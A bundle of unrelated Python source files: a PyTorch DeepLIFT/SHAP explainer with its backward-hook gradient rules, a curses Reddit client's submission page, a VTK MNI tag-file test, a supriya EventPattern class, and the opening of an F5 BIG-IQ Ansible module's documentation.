            # inputs via a temporary forward hook.
            self.interim = True
            model, layer = model
            model = model.eval()
            self.layer = layer
            self.add_target_handle(self.layer)

            # if we are taking an interim layer, the 'data' is going to be the input
            # of the interim layer; we will capture this using a forward hook
            with torch.no_grad():
                _ = model(*data)
                interim_inputs = self.layer.target_input
                if type(interim_inputs) is tuple:
                    # this should always be true, but just to be safe
                    self.interim_inputs_shape = [i.shape for i in interim_inputs]
                else:
                    self.interim_inputs_shape = [interim_inputs.shape]
            # Remove the temporary hook and its captured state.
            self.target_handle.remove()
            del self.layer.target_input
        self.model = model.eval()

        self.multi_output = False
        self.num_outputs = 1
        with torch.no_grad():
            outputs = model(*data)

            # also get the device everything is running on
            self.device = outputs.device
            # NOTE(review): assumes the model output is 2-D (batch, outputs);
            # confirm for models returning other shapes.
            if outputs.shape[1] > 1:
                self.multi_output = True
                self.num_outputs = outputs.shape[1]
            self.expected_value = outputs.mean(0).cpu().numpy()

    def add_target_handle(self, layer):
        """Register a forward hook on `layer` that records its inputs; the
        handle is kept on self.target_handle so it can be removed later."""
        self.target_handle = layer.register_forward_hook(get_target_input)

    def add_handles(self, model, forward_handle, backward_handle):
        """
        Add handles to all non-container layers in the model.
        Recursively for non-container layers
        """
        children = list(model.children())
        if not children:
            # Leaf module: hook it directly.
            return [model.register_forward_hook(forward_handle),
                    model.register_backward_hook(backward_handle)]
        collected = []
        for child in children:
            collected.extend(self.add_handles(child, forward_handle, backward_handle))
        return collected

    def remove_attributes(self, model):
        """
        Removes the x and y attributes which were added by the forward handles
        Recursively searches for non-container layers
        """
        for child in model.children():
            if 'nn.modules.container' in str(type(child)):
                # Containers hold no hooks of their own; recurse into them.
                self.remove_attributes(child)
                continue
            for attr_name in ('x', 'y'):
                try:
                    delattr(child, attr_name)
                except AttributeError:
                    pass

    def gradient(self, idx, inputs):
        """Return gradients of output column `idx` w.r.t. the inputs.

        In interim mode the gradients are taken with respect to the captured
        interim-layer inputs, and those inputs are returned as a second value.
        """
        self.model.zero_grad()
        X = [x.requires_grad_() for x in inputs]
        outputs = self.model(*X)
        selected = [val for val in outputs[:, idx]]
        grads = []
        if self.interim:
            interim_inputs = self.layer.target_input
            for idx, input in enumerate(interim_inputs):
                # Retain the graph until the last gradient has been taken.
                grad = torch.autograd.grad(selected, input,
                                           retain_graph=True if idx + 1 < len(interim_inputs) else None,
                                           allow_unused=True)[0]
                if grad is not None:
                    grad = grad.cpu().numpy()
                else:
                    # Unused inputs get a zero gradient of matching shape.
                    grad = torch.zeros_like(X[idx]).cpu().numpy()
                grads.append(grad)
            # Drop the captured state so the next forward pass starts clean.
            del self.layer.target_input
            return grads, [i.detach().cpu().numpy() for i in interim_inputs]
        else:
            for idx, x in enumerate(X):
                grad = torch.autograd.grad(selected, x,
                                           retain_graph=True if idx + 1 < len(X) else None,
                                           allow_unused=True)[0]
                if grad is not None:
                    grad = grad.cpu().numpy()
                else:
                    grad = torch.zeros_like(X[idx]).cpu().numpy()
                grads.append(grad)
            return grads

    def shap_values(self, X, ranked_outputs=None, output_rank_order="max", check_additivity=False):
        """Estimate SHAP attributions for ``X`` against the background data.

        Parameters
        ----------
        X : torch.Tensor or list of torch.Tensor
            Model inputs; a bare tensor when ``self.multi_input`` is False,
            otherwise a list of tensors.
        ranked_outputs : int or None
            For multi-output models, explain only the top ``ranked_outputs``
            outputs per sample, ranked per ``output_rank_order``.
        output_rank_order : str
            One of "max", "min", "max_abs".
        check_additivity : bool
            NOTE(review): accepted but never used in this implementation.

        Returns
        -------
        Attribution arrays shaped like the inputs (or like the interim layer
        inputs when ``self.interim``); with ``ranked_outputs`` also returns
        the rank indices that were explained.
        """

        # X ~ self.model_input
        # X_data ~ self.data

        # check if we have multiple inputs
        if not self.multi_input:
            assert type(X) != list, "Expected a single tensor model input!"
            X = [X]
        else:
            assert type(X) == list, "Expected a list of model inputs!"

        X = [x.detach().to(self.device) for x in X]

        if ranked_outputs is not None and self.multi_output:
            with torch.no_grad():
                model_output_values = self.model(*X)
            # rank and determine the model outputs that we will explain
            if output_rank_order == "max":
                _, model_output_ranks = torch.sort(model_output_values, descending=True)
            elif output_rank_order == "min":
                _, model_output_ranks = torch.sort(model_output_values, descending=False)
            elif output_rank_order == "max_abs":
                _, model_output_ranks = torch.sort(torch.abs(model_output_values), descending=True)
            else:
                assert False, "output_rank_order must be max, min, or max_abs!"
            model_output_ranks = model_output_ranks[:, :ranked_outputs]
        else:
            # explain every output, in order, for every sample
            model_output_ranks = (torch.ones((X[0].shape[0], self.num_outputs)).int() *
                                  torch.arange(0, self.num_outputs).int())

        # add the gradient handles
        handles = self.add_handles(self.model, add_interim_values, deeplift_grad)
        if self.interim:
            self.add_target_handle(self.layer)

        # compute the attributions
        output_phis = []
        for i in range(model_output_ranks.shape[1]):
            phis = []
            # allocate per-input attribution arrays (one row per sample)
            if self.interim:
                for k in range(len(self.interim_inputs_shape)):
                    phis.append(np.zeros((X[0].shape[0], ) + self.interim_inputs_shape[k][1: ]))
            else:
                for k in range(len(X)):
                    phis.append(np.zeros(X[k].shape))
            for j in range(X[0].shape[0]):
                # tile the inputs to line up with the background data samples
                tiled_X = [X[l][j:j + 1].repeat(
                                   (self.data[l].shape[0],) + tuple([1 for k in range(len(X[l].shape) - 1)])) for l
                           in range(len(X))]
                # sample copies first, background second — the hook functions
                # rely on this ordering when splitting tensors in half
                joint_x = [torch.cat((tiled_X[l], self.data[l]), dim=0) for l in range(len(X))]
                # run attribution computation graph
                feature_ind = model_output_ranks[j, i]
                sample_phis = self.gradient(feature_ind, joint_x)
                # assign the attributions to the right part of the output arrays
                if self.interim:
                    sample_phis, output = sample_phis
                    x, data = [], []
                    for k in range(len(output)):
                        x_temp, data_temp = np.split(output[k], 2)
                        x.append(x_temp)
                        data.append(data_temp)
                    for l in range(len(self.interim_inputs_shape)):
                        phis[l][j] = (sample_phis[l][self.data[l].shape[0]:] * (x[l] - data[l])).mean(0)
                else:
                    # multipliers (background half of the gradient) times
                    # (input - background), averaged over background samples
                    for l in range(len(X)):
                        phis[l][j] = (torch.from_numpy(sample_phis[l][self.data[l].shape[0]:]).to(self.device) * (X[l][j: j + 1] - self.data[l])).cpu().detach().numpy().mean(0)
            output_phis.append(phis[0] if not self.multi_input else phis)
        # cleanup; remove all gradient handles
        for handle in handles:
            handle.remove()
        self.remove_attributes(self.model)
        if self.interim:
            self.target_handle.remove()

        if not self.multi_output:
            return output_phis[0]
        elif ranked_outputs is not None:
            return output_phis, model_output_ranks
        else:
            return output_phis

# Module hooks


def deeplift_grad(module, grad_input, grad_output):
    """Backward hook that applies the DeepLIFT gradient rule for ``module``.

    Returns a replacement gradient for supported op types, ``None`` (leave
    the gradient untouched) for passthrough/linear ops, and the unmodified
    ``grad_input`` for unrecognized module types, with a warning.
    """
    module_type = module.__class__.__name__
    handler = op_handler.get(module_type)
    if handler is None:
        print('Warning: unrecognized nn.Module: {}'.format(module_type))
        return grad_input
    if handler.__name__ not in ('passthrough', 'linear_1d'):
        return handler(module, grad_input, grad_output)


def add_interim_values(module, input, output):
    """The forward hook used to save interim tensors, detached
    from the graph. Used to calculate the multipliers
    """
    # clear any tensors cached by a previous forward pass
    try:
        del module.x
    except AttributeError:
        pass
    try:
        del module.y
    except AttributeError:
        pass
    module_type = module.__class__.__name__
    if module_type in op_handler:
        func_name = op_handler[module_type].__name__
        # First, check for cases where we don't need to save the x and y tensors
        if func_name == 'passthrough':
            pass
        else:
            # check only the 0th input varies
            for i in range(len(input)):
                if i != 0 and type(output) is tuple:
                    # NOTE(review): `==` on tensors is elementwise, so this
                    # assert would raise on a multi-element tensor result;
                    # presumably only scalar/identical extras reach here —
                    # confirm against the supported module types.
                    assert input[i] == output[i], "Only the 0th input may vary!"
            # if a new method is added, it must be added here too. This ensures tensors
            # are only saved if necessary
            if func_name in ['maxpool', 'nonlinear_1d']:
                # only save tensors if necessary
                if type(input) is tuple:
                    setattr(module, 'x', torch.nn.Parameter(input[0].detach()))
                else:
                    setattr(module, 'x', torch.nn.Parameter(input.detach()))
                if type(output) is tuple:
                    setattr(module, 'y', torch.nn.Parameter(output[0].detach()))
                else:
                    setattr(module, 'y', torch.nn.Parameter(output.detach()))
            if module_type in failure_case_modules:
                # unreliable backward-hook modules get a tensor hook that
                # replays the stored gradient instead (see note below)
                input[0].register_hook(deeplift_tensor_grad)


def get_target_input(module, input, output):
    """Forward hook that stores the module's input, still attached to the graph.

    Used when we want to explain the interim outputs of a model.
    """
    try:
        delattr(module, 'target_input')
    except AttributeError:
        pass
    module.target_input = input

# From the documentation: "The current implementation will not have the presented behavior for
# complex Module that perform many operations. In some failure cases, grad_input and grad_output
# will only contain the gradients for a subset of the inputs and outputs."
# The tensor hook below handles such failure cases (currently, MaxPool1d). In such cases, the deeplift
# grad should still be computed, and then appended to the complex_module_gradients list. The tensor hook
# will then retrieve the proper gradient from this list.


# Modules whose built-in backward hook is known to misbehave (see note above).
failure_case_modules = ['MaxPool1d']


def deeplift_tensor_grad(grad):
    """Tensor hook: pop and return the most recently stored complex-module gradient."""
    return complex_module_gradients.pop()


# Stack of gradients stashed by `maxpool` for the failure-case modules.
complex_module_gradients = []


def passthrough(module, grad_input, grad_output):
    """No adjustment needed; returning ``None`` keeps the autograd gradient as-is."""
    return None


def maxpool(module, grad_input, grad_output):
    """Backward hook implementing the DeepLIFT rule for max-pooling layers.

    Uses the ``x``/``y`` tensors cached by ``add_interim_values`` (first half:
    sample batch, second half: reference batch, per the `torch.chunk` split
    below) and redistributes the output-side differences back through the
    pooling indices via the matching unpool op.
    """
    pool_to_unpool = {
        'MaxPool1d': torch.nn.functional.max_unpool1d,
        'MaxPool2d': torch.nn.functional.max_unpool2d,
        'MaxPool3d': torch.nn.functional.max_unpool3d
    }
    pool_to_function = {
        'MaxPool1d': torch.nn.functional.max_pool1d,
        'MaxPool2d': torch.nn.functional.max_pool2d,
        'MaxPool3d': torch.nn.functional.max_pool3d
    }
    # input-side difference between sample and reference halves
    delta_in = module.x[: int(module.x.shape[0] / 2)] - module.x[int(module.x.shape[0] / 2):]
    dup0 = [2] + [1 for i in delta_in.shape[1:]]
    # we also need to check if the output is a tuple
    y, ref_output = torch.chunk(module.y, 2)
    cross_max = torch.max(y, ref_output)
    diffs = torch.cat([cross_max - ref_output, y - cross_max], 0)

    # all of this just to unpool the outputs
    with torch.no_grad():
        # re-run the pool with return_indices=True to recover the argmax map
        _, indices = pool_to_function[module.__class__.__name__](
            module.x, module.kernel_size, module.stride, module.padding,
            module.dilation, module.ceil_mode, True)
        xmax_pos, rmax_pos = torch.chunk(pool_to_unpool[module.__class__.__name__](
            grad_output[0] * diffs, indices, module.kernel_size, module.stride,
            module.padding, list(module.x.shape)), 2)
    org_input_shape = grad_input[0].shape  # for the maxpool 1d
    grad_input = [None for _ in grad_input]
    # guard against division by a near-zero delta_in
    grad_input[0] = torch.where(torch.abs(delta_in) < 1e-7, torch.zeros_like(delta_in),
                           (xmax_pos + rmax_pos) / delta_in).repeat(dup0)
    if module.__class__.__name__ == 'MaxPool1d':
        complex_module_gradients.append(grad_input[0])
        # the grad input that is returned doesn't matter, since it will immediately be
        # be overridden by the grad in the complex_module_gradient
        # NOTE(review): torch.ones(org_input_shape) is allocated on the
        # default device — may mismatch GPU inputs; confirm.
        grad_input[0] = torch.ones(org_input_shape)
    return tuple(grad_input)


def linear_1d(module, grad_input, grad_output):
    """Linear ops need no adjustment; ``None`` leaves the gradient unchanged."""
    return None


def nonlinear_1d(module, grad_input, grad_output):
    """Rescale-rule gradient for elementwise nonlinearities.

    The cached ``x``/``y`` hold the sample batch in the first half and the
    reference batch in the second; the multiplier is delta_out / delta_in,
    falling back to the plain gradient where delta_in is numerically tiny.
    """
    half_out = int(module.y.shape[0] / 2)
    delta_out = module.y[:half_out] - module.y[half_out:]

    half_in = int(module.x.shape[0] / 2)
    delta_in = module.x[:half_in] - module.x[half_in:]
    tile = [2] + [1] * (len(delta_in.shape) - 1)
    grads = [None] * len(grad_input)
    # handles numerical instabilities where delta_in is very small by
    # just taking the gradient in those cases
    grads[0] = torch.where(torch.abs(delta_in.repeat(tile)) < 1e-6, grad_input[0],
                           grad_output[0] * (delta_out / delta_in).repeat(tile))
    return tuple(grads)


# Maps an nn.Module class name to the gradient rule deeplift_grad applies.
op_handler = {
    # passthrough ops, where we make no change to the gradient
    'Dropout3d': passthrough,
    'Dropout2d': passthrough,
    'Dropout': passthrough,
    'AlphaDropout': passthrough,

    # ops whose gradient is left unchanged (handled as linear_1d)
    'Conv1d': linear_1d,
    'Conv2d': linear_1d,
    'Conv3d': linear_1d,
    'ConvTranspose1d': linear_1d,
    'ConvTranspose2d': linear_1d,
    'ConvTranspose3d': linear_1d,
    'Linear': linear_1d,
    'AvgPool1d': linear_1d,
    'AvgPool2d': linear_1d,
    'AvgPool3d': linear_1d,
    'AdaptiveAvgPool1d': linear_1d,
    'AdaptiveAvgPool2d': linear_1d,
    'AdaptiveAvgPool3d': linear_1d,
    'BatchNorm1d': linear_1d,
    'BatchNorm2d': linear_1d,
    'BatchNorm3d': linear_1d,

    # elementwise nonlinearities, handled by the rescale rule
    'LeakyReLU': nonlinear_1d,
    'ReLU': nonlinear_1d,
    'ELU': nonlinear_1d,
    'Sigmoid': nonlinear_1d,
    'Tanh': nonlinear_1d,
    'Softplus': nonlinear_1d,
    'Softmax': nonlinear_1d,

    # max pooling needs its own unpooling-based rule
    'MaxPool1d': maxpool,
    'MaxPool2d': maxpool,
    'MaxPool3d': maxpool,
}

# -*- coding: utf-8 -*-
from __future__ import unicode_literals

import time
import curses

from . import docs
from .content import SubmissionContent, SubredditContent
from .page import Page, PageController, logged_in
from .objects import Navigator, Color, Command
from .exceptions import TemporaryFileError


class SubmissionController(PageController):
    """Keybinding controller for SubmissionPage.

    character_map is presumably filled in by the @SubmissionController.register
    decorators on the page methods below — confirm against PageController.
    """
    character_map = {}


class SubmissionPage(Page):
    """Curses page showing a single submission together with its comment tree.

    Navigation starts at the submission itself (page index -1); comments
    follow at later indices.
    """

    FOOTER = docs.FOOTER_SUBMISSION

    def __init__(self, reddit, term, config, oauth, url=None, submission=None):
        super(SubmissionPage, self).__init__(reddit, term, config, oauth)

        self.controller = SubmissionController(self, keymap=config.keymap)

        # content can be built either from a permalink or from an
        # already-fetched submission object
        if url:
            self.content = SubmissionContent.from_url(
                reddit, url, term.loader,
                max_comment_cols=config['max_comment_cols'])
        else:
            self.content = SubmissionContent(
                submission, term.loader,
                max_comment_cols=config['max_comment_cols'])
        # Start at the submission post, which is indexed as -1
        self.nav = Navigator(self.content.get, page_index=-1)
        self.selected_subreddit = None

    @SubmissionController.register(Command('SUBMISSION_TOGGLE_COMMENT'))
    def toggle_comment(self):
        "Toggle the selected comment tree between visible and hidden"

        current_index = self.nav.absolute_index
        self.content.toggle(current_index)

        # This logic handles a display edge case after a comment toggle. We
        # want to make sure that when we re-draw the page, the cursor stays at
        # its current absolute position on the screen. In order to do this,
        # apply a fixed offset if, while inverted, we either try to hide the
        # bottom comment or toggle any of the middle comments.
        if self.nav.inverted:
            data = self.content.get(current_index)
            if data['hidden'] or self.nav.cursor_index != 0:
                window = self._subwindows[-1][0]
                n_rows, _ = window.getmaxyx()
                self.nav.flip(len(self._subwindows) - 1)
                self.nav.top_item_height = n_rows

    @SubmissionController.register(Command('SUBMISSION_EXIT'))
    def exit_submission(self):
        "Close the submission and return to the subreddit page"

        self.active = False

    @SubmissionController.register(Command('REFRESH'))
    def refresh_content(self, order=None, name=None):
        "Re-download comments and reset the page index"

        # fall back to the current content's order/name when not given
        order = order or self.content.order
        url = name or self.content.name

        with self.term.loader('Refreshing page'):
            self.content = SubmissionContent.from_url(
                self.reddit, url, self.term.loader, order=order,
                max_comment_cols=self.config['max_comment_cols'])
        if not self.term.loader.exception:
            self.nav = Navigator(self.content.get, page_index=-1)

    @SubmissionController.register(Command('PROMPT'))
    def prompt_subreddit(self):
        "Open a prompt to navigate to a different subreddit"

        name = self.term.prompt_input('Enter page: /')
        if name is not None:
            with self.term.loader('Loading page'):
                content = SubredditContent.from_name(
                    self.reddit, name, self.term.loader)
            # only switch pages when loading succeeded
            if not self.term.loader.exception:
                self.selected_subreddit = content
                self.active = False

    @SubmissionController.register(Command('SUBMISSION_OPEN_IN_BROWSER'))
    def open_link(self):
        "Open the selected item with the webbrowser"

        data = self.get_selected_item()
        url = data.get('permalink')
        if url:
            self.term.open_browser(url)
        else:
            self.term.flash()

    @SubmissionController.register(Command('SUBMISSION_OPEN_IN_PAGER'))
    def open_pager(self):
        "Open the selected item with the system's pager"
        data = self.get_selected_item()
        if data['type'] == 'Submission':
            text = '\n\n'.join((data['permalink'], data['text']))
            self.term.open_pager(text)
        elif data['type'] == 'Comment':
            text = '\n\n'.join((data['permalink'], data['body']))
            self.term.open_pager(text)
        else:
            self.term.flash()

    @SubmissionController.register(Command('SUBMISSION_POST'))
    @logged_in
    def add_comment(self):
        """
        Submit a reply to the selected item.

        Selected item:
            Submission - add a top level comment
            Comment - add a comment reply
        """

        data = self.get_selected_item()
        if data['type'] == 'Submission':
            body = data['text']
            reply = data['object'].add_comment
        elif data['type'] == 'Comment':
            body = data['body']
            reply = data['object'].reply
        else:
            self.term.flash()
            return

        # Construct the text that will be displayed in the editor file.
        # The post body will be commented out and added for reference
        lines = ['#  |' + line for line in body.split('\n')]
        content = '\n'.join(lines)
        comment_info = docs.COMMENT_FILE.format(
            author=data['author'],
            type=data['type'].lower(),
            content=content)

        with self.term.open_editor(comment_info) as comment:
            if not comment:
                self.term.show_notification('Canceled')
                return

            with self.term.loader('Posting', delay=0):
                reply(comment)
                # Give reddit time to process the submission
                time.sleep(2.0)

            if self.term.loader.exception is None:
                self.refresh_content()
            else:
                # posting failed; keep the draft around for the user
                raise TemporaryFileError()

    @SubmissionController.register(Command('DELETE'))
    @logged_in
    def delete_comment(self):
        "Delete the selected comment"

        if self.get_selected_item()['type'] == 'Comment':
            self.delete_item()
        else:
            self.term.flash()

    @SubmissionController.register(Command('SUBMISSION_OPEN_IN_URLVIEWER'))
    def comment_urlview(self):
        # Extract whichever text field the selected item carries
        data = self.get_selected_item()
        comment = data.get('body') or data.get('text') or data.get('url_full')
        if comment:
            self.term.open_urlview(comment)
        else:
            self.term.flash()

    def _draw_item(self, win, data, inverted):
        # Dispatch to the renderer matching the item type.
        # NOTE(review): MoreComments and HiddenComment share a renderer;
        # the two branches could be merged.
        if data['type'] == 'MoreComments':
            return self._draw_more_comments(win, data)
        elif data['type'] == 'HiddenComment':
            return self._draw_more_comments(win, data)
        elif data['type'] == 'Comment':
            return self._draw_comment(win, data, inverted)
        else:
            return self._draw_submission(win, data)

    def _draw_comment(self, win, data, inverted):
        # Render a single comment into its subwindow; returns the attribute
        # used for the left-hand indentation bar.
        n_rows, n_cols = win.getmaxyx()
        n_cols -= 1

        # Handle the case where the window is not large enough to fit the text.
        valid_rows = range(0, n_rows)
        offset = 0 if not inverted else -(data['n_rows'] - n_rows)

        # If there isn't enough space to fit the comment body on the screen,
        # replace the last line with a notification.
        split_body = data['split_body']
        if data['n_rows'] > n_rows:
            # Only when there is a single comment on the page and not inverted
            if not inverted and len(self._subwindows) == 0:
                cutoff = data['n_rows'] - n_rows + 1
                split_body = split_body[:-cutoff]
                split_body.append('(Not enough space to display)')

        row = offset
        if row in valid_rows:
            # header line: author, flair, vote arrow, score, timestamp, badges

            attr = curses.A_BOLD
            attr |= (Color.BLUE if not data['is_author'] else Color.GREEN)
            self.term.add_line(win, '{author} '.format(**data), row, 1, attr)

            if data['flair']:
                attr = curses.A_BOLD | Color.YELLOW
                self.term.add_line(win, '{flair} '.format(**data), attr=attr)

            text, attr = self.term.get_arrow(data['likes'])
            self.term.add_line(win, text, attr=attr)
            self.term.add_line(win, ' {score} {created} '.format(**data))

            if data['gold']:
                text, attr = self.term.guilded
                self.term.add_line(win, text, attr=attr)

            if data['stickied']:
                text, attr = '[stickied]', Color.GREEN
                self.term.add_line(win, text, attr=attr)

            if data['saved']:
                text, attr = '[saved]', Color.GREEN
                self.term.add_line(win, text, attr=attr)

        for row, text in enumerate(split_body, start=offset+1):
            if row in valid_rows:
                self.term.add_line(win, text, row, 1)

        # Unfortunately vline() doesn't support custom color so we have to
        # build it one segment at a time.
        attr = Color.get_level(data['level'])
        x = 0
        for y in range(n_rows):
            self.term.addch(win, y, x, self.term.vline, attr)

        return attr | self.term.vline

    def _draw_more_comments(self, win, data):
        # Render a collapsed "more comments" / hidden-comment stub.
        n_rows, n_cols = win.getmaxyx()
        n_cols -= 1

        self.term.add_line(win, '{body}'.format(**data), 0, 1)
        self.term.add_line(
            win, ' [{count}]'.format(**data), attr=curses.A_BOLD)

        attr = Color.get_level(data['level'])
        self.term.addch(win, 0, 0, self.term.vline, attr)

        return attr | self.term.vline

    def _draw_submission(self, win, data):
        # Render the submission itself (title, metadata, self-text, badges).
        n_rows, n_cols = win.getmaxyx()
        n_cols -= 3  # one for each side of the border + one for offset

        for row, text in enumerate(data['split_title'], start=1):
            self.term.add_line(win, text, row, 1, curses.A_BOLD)

        row = len(data['split_title']) + 1
        attr = curses.A_BOLD | Color.GREEN
        self.term.add_line(win, '{author}'.format(**data), row, 1, attr)
        attr = curses.A_BOLD | Color.YELLOW
        if data['flair']:
            self.term.add_line(win, ' {flair}'.format(**data), attr=attr)
        self.term.add_line(win, ' {created} {subreddit}'.format(**data))

        row = len(data['split_title']) + 2
        attr = curses.A_UNDERLINE | Color.BLUE
        self.term.add_line(win, '{url}'.format(**data), row, 1, attr)
        offset = len(data['split_title']) + 3

        # Cut off text if there is not enough room to display the whole post
        split_text = data['split_text']
        if data['n_rows'] > n_rows:
            cutoff = data['n_rows'] - n_rows + 1
            split_text = split_text[:-cutoff]
            split_text.append('(Not enough space to display)')

        for row, text in enumerate(split_text, start=offset):
            self.term.add_line(win, text, row, 1)

        row = len(data['split_title']) + len(split_text) + 3
        self.term.add_line(win, '{score} '.format(**data), row, 1)
        text, attr = self.term.get_arrow(data['likes'])
        self.term.add_line(win, text, attr=attr)
        self.term.add_line(win, ' {comments} '.format(**data))

        if data['gold']:
            text, attr = self.term.guilded
            self.term.add_line(win, text, attr=attr)

        if data['nsfw']:
            text, attr = 'NSFW', (curses.A_BOLD | Color.RED)
            self.term.add_line(win, text, attr=attr)

        if data['saved']:
            text, attr = '[saved]', Color.GREEN
            self.term.add_line(win, text, attr=attr)

        win.border()

#!/usr/bin/env python
import os
import vtk
from vtk.test import Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()

# Test label reading from an MNI tag file
#

# The current directory must be writeable.
#
try:
    fname = "mni-tagtest.tag"
    # probe writeability up front; failure lands in the IOError handler below
    channel = open(fname, "wb")
    channel.close()

    # create some random points in a sphere
    #
    sphere1 = vtk.vtkPointSource()
    sphere1.SetNumberOfPoints(13)

    xform = vtk.vtkTransform()
    xform.RotateWXYZ(20, 1, 0, 0)

    xformFilter = vtk.vtkTransformFilter()
    xformFilter.SetTransform(xform)
    xformFilter.SetInputConnection(sphere1.GetOutputPort())

    # one label per point: a mix of numeric and name strings
    labels = vtk.vtkStringArray()
    labels.InsertNextValue("0")
    labels.InsertNextValue("1")
    labels.InsertNextValue("2")
    labels.InsertNextValue("3")
    labels.InsertNextValue("Halifax")
    labels.InsertNextValue("Toronto")
    labels.InsertNextValue("Vancouver")
    labels.InsertNextValue("Larry")
    labels.InsertNextValue("Bob")
    labels.InsertNextValue("Jackie")
    labels.InsertNextValue("10")
    labels.InsertNextValue("11")
    labels.InsertNextValue("12")

    # one weight per point
    weights = vtk.vtkDoubleArray()
    weights.InsertNextValue(1.0)
    weights.InsertNextValue(1.1)
    weights.InsertNextValue(1.2)
    weights.InsertNextValue(1.3)
    weights.InsertNextValue(1.4)
    weights.InsertNextValue(1.5)
    weights.InsertNextValue(1.6)
    weights.InsertNextValue(1.7)
    weights.InsertNextValue(1.8)
    weights.InsertNextValue(1.9)
    weights.InsertNextValue(0.9)
    weights.InsertNextValue(0.8)
    weights.InsertNextValue(0.7)

    # write two point volumes plus labels/weights to the tag file
    writer = vtk.vtkMNITagPointWriter()
    writer.SetFileName(fname)
    writer.SetInputConnection(sphere1.GetOutputPort())
    writer.SetInputConnection(1, xformFilter.GetOutputPort())
    writer.SetLabelText(labels)
    writer.SetWeights(weights)
    writer.SetComments("Volume 1: sphere points\nVolume 2: transformed points")
    writer.Write()

    # read it back
    reader = vtk.vtkMNITagPointReader()
    reader.CanReadFile(fname)
    reader.SetFileName(fname)

    textProp = vtk.vtkTextProperty()
    textProp.SetFontSize(12)
    textProp.SetColor(1.0, 1.0, 0.5)

    labelHier = vtk.vtkPointSetToLabelHierarchy()
    labelHier.SetInputConnection(reader.GetOutputPort())
    labelHier.SetTextProperty(textProp)
    labelHier.SetLabelArrayName("LabelText")
    labelHier.SetMaximumDepth(15)
    labelHier.SetTargetLabelCount(12)

    labelMapper = vtk.vtkLabelPlacementMapper()
    labelMapper.SetInputConnection(labelHier.GetOutputPort())
    labelMapper.UseDepthBufferOff()
    labelMapper.SetShapeToRect()
    labelMapper.SetStyleToOutline()

    labelActor = vtk.vtkActor2D()
    labelActor.SetMapper(labelMapper)

    # draw a small sphere glyph at each tag point
    glyphSource = vtk.vtkSphereSource()
    glyphSource.SetRadius(0.01)

    glyph = vtk.vtkGlyph3D()
    glyph.SetSourceConnection(glyphSource.GetOutputPort())
    glyph.SetInputConnection(reader.GetOutputPort())

    mapper = vtk.vtkDataSetMapper()
    mapper.SetInputConnection(glyph.GetOutputPort())

    actor = vtk.vtkActor()
    actor.SetMapper(mapper)

    # Create rendering stuff
    ren1 = vtk.vtkRenderer()
    renWin = vtk.vtkRenderWindow()
    renWin.SetMultiSamples(0)
    renWin.AddRenderer(ren1)
    iren = vtk.vtkRenderWindowInteractor()
    iren.SetRenderWindow(renWin)
    # Add the actors to the renderer, set the background and size
    #
    ren1.AddViewProp(actor)
    ren1.AddViewProp(labelActor)
    ren1.SetBackground(0, 0, 0)

    renWin.SetSize(300, 300)

    renWin.Render()
    # clean up the temporary tag file
    try:
        os.remove(fname)
    except OSError:
        pass

    # render the image
    #
#    iren.Start()

except IOError:
    # Fix: use the print() function (the Python 2 print statement is a
    # syntax error on Python 3; this form works on both).
    print("Unable to test the writer/reader.")

import uuid

from uqbar.objects import new

from supriya.patterns.Pattern import Pattern


class EventPattern(Pattern):
    """Pattern whose iterator output is coerced into UUID-tagged events."""

    ### CLASS VARIABLES ###

    __slots__ = ()

    ### SPECIAL METHODS ###

    def _coerce_iterator_output(self, expr, state=None):
        """Wrap raw mappings as NoteEvents and guarantee each event has a UUID."""
        import supriya.patterns

        if not isinstance(expr, supriya.patterns.Event):
            expr = supriya.patterns.NoteEvent(**expr)
        if expr.get("uuid") is not None:
            return expr
        return new(expr, uuid=uuid.uuid4())

    ### PUBLIC METHODS ###

    def play(self, clock=None, server=None):
        """Start a realtime player for this pattern and return it."""
        import supriya.patterns
        import supriya.realtime

        player = supriya.patterns.RealtimeEventPlayer(
            self,
            clock=clock,
            server=server or supriya.realtime.Server.default(),
        )
        player.start()
        return player

    def with_bus(self, calculation_rate="audio", channel_count=None, release_time=0.25):
        """Route this pattern through its own bus via Pbus."""
        import supriya.patterns

        bus_settings = dict(
            calculation_rate=calculation_rate,
            channel_count=channel_count,
            release_time=release_time,
        )
        return supriya.patterns.Pbus(self, **bus_settings)

    def with_effect(self, synthdef, release_time=0.25, **settings):
        """Apply an effect synthdef over this pattern via Pfx."""
        import supriya.patterns

        return supriya.patterns.Pfx(
            self, synthdef=synthdef, release_time=release_time, **settings
        )

    def with_group(self, release_time=0.25):
        """Wrap this pattern's playback in a group via Pgroup."""
        import supriya.patterns

        return supriya.patterns.Pgroup(self, release_time=release_time)

#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright: (c) 2017, F5 Networks Inc.
# GNU General Public License v3.0 (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)

from __future__ import absolute_import, division, print_function
__metaclass__ = type

# Ansible documentation block: parsed as YAML by ansible-doc tooling.
# Keep the raw-string content and indentation byte-exact.
DOCUMENTATION = r'''
---
module: bigiq_regkey_license_assignment
short_description: Manage regkey license assignment on BIG-IPs from a BIG-IQ
description:
  - Manages the assignment of regkey licenses on a BIG-IQ. Assignment means
    the license is assigned to a BIG-IP, or it needs to be assigned to a BIG-IP.
    Additionally, this module supports revoking the assignments from BIG-IP devices.
version_added: "1.0.0"
options:
  pool:
    description:
      - The registration key pool to use.
    type: str
    required: True
  key:
    description:
      - The registration key you want to assign from the pool.
    type: str
    required: True
  device:
    description:
      - When C(managed) is C(no), specifies the address, or hostname, where the BIG-IQ
        can reach the remote device to register.
      - When C(managed) is C(yes), specifies the managed device, or device UUID, that
        you want to register.
      - If C(managed) is C(yes), it is very important you do not have more than
        one device with the same name. BIG-IQ internally recognizes devices by their ID,
        and therefore, this module cannot guarantee the correct device will be
        registered. The device returned is the device that is used.
    type: str
    required: True
  managed:
    description:
      - Whether the specified device is a managed or un-managed device.
      - When C(state) is C(present), this parameter is required.
    type: bool
  device_port:
    description:
      - Specifies the port of the remote device to connect to.
      - If this parameter is not specified, the default is C(443).
    type: int
    default: 443
  device_username:
    description:
      - The username used to connect to the remote device.
      - This username should be one that has sufficient privileges on the remote device
        to do licensing. Usually this is the C(Administrator) role.
      - When C(managed) is C(no), this parameter is required.
    type: str
  device_password:
    description:
      - The password of the C(device_username).
      - When C(managed) is C(no), this parameter is required.
    type: str
  state:
    description:
      - When C(present), ensures the device is assigned the specified license.
      - When C(absent), ensures the license is revoked from the remote device and freed
        on the BIG-IQ.
    type: str
    choices:
      - present
      - absent
    default: present
